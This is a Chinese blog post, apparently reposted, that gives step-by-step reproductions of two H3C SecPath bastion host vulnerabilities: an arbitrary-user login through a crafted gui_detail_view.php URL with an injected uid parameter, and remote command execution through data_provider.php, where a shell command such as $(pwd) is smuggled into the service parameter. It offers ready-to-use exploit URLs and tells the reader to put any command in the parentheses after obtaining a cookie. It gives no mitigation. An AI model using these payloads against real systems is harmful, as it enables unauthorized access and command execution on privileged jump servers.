H3C SecParh堡垒机任意用户登录与远程执行代码漏洞

没有人挡得住,你疯狂的努力进取。你可以不够强大,但你不能没有梦想。如果你没有梦想,你只能为别人的梦想打工筑路。

导读:本篇文章讲解 H3C SecParh堡垒机任意用户登录与远程执行代码漏洞,希望对大家有帮助,欢迎收藏,转发!站点地址:www.bmabk.com,来源:原文

1.H3C SecParh堡垒机任意用户登录漏洞

1.1.漏洞描述

  在H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞。

1.2.漏洞影响

  H3C SecParh堡垒机

1.3.漏洞复现

1.3.1.登录页面

  该漏洞版本的登录页面如下,2018年的。
在这里插入图片描述

1.3.2.构建URL

URL:https://IP地址:端口//audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin

在这里插入图片描述

1.4.总结

  这里确实成功登录上去了,若设定三权的话,可能存在把admin用户设定为类似与这里的审计管理员,那么就需要测试是否能够跳转到操作管理员或者其它的一些管理员账号上去。这里就不再深入测试,只是提供一个思路。

2.H3C SecParh堡垒机远程命令执行漏洞

2.1.漏洞描述

  H3C SecParh堡垒机data_provider.php存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令。

2.2.漏洞影响

  H3C SecParh堡垒机

2.3.漏洞复现

2.3.1.登录页面

  该漏洞版本的登录页面如下,2018年的。
在这里插入图片描述

2.3.2.构建URL

URL:https://IP地址:端口/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(pwd)&identity_cond=&query_type=all&format=json&browse=true

  需要注意一定要通过先通过任意用户登录获取Cookie,然后在URL中service后面的括号中输入想要执行的命令,即可实现远程命令执行。
在这里插入图片描述

2.4.总结

  我使用火狐浏览器,我访问后就自动将信息进行下载,不过也有浏览器直接跳转界面的也行,都能够看到。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/133411.html

(0)
飞熊的头像飞熊bm

相关推荐

发表回复

登录后才能评论
极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!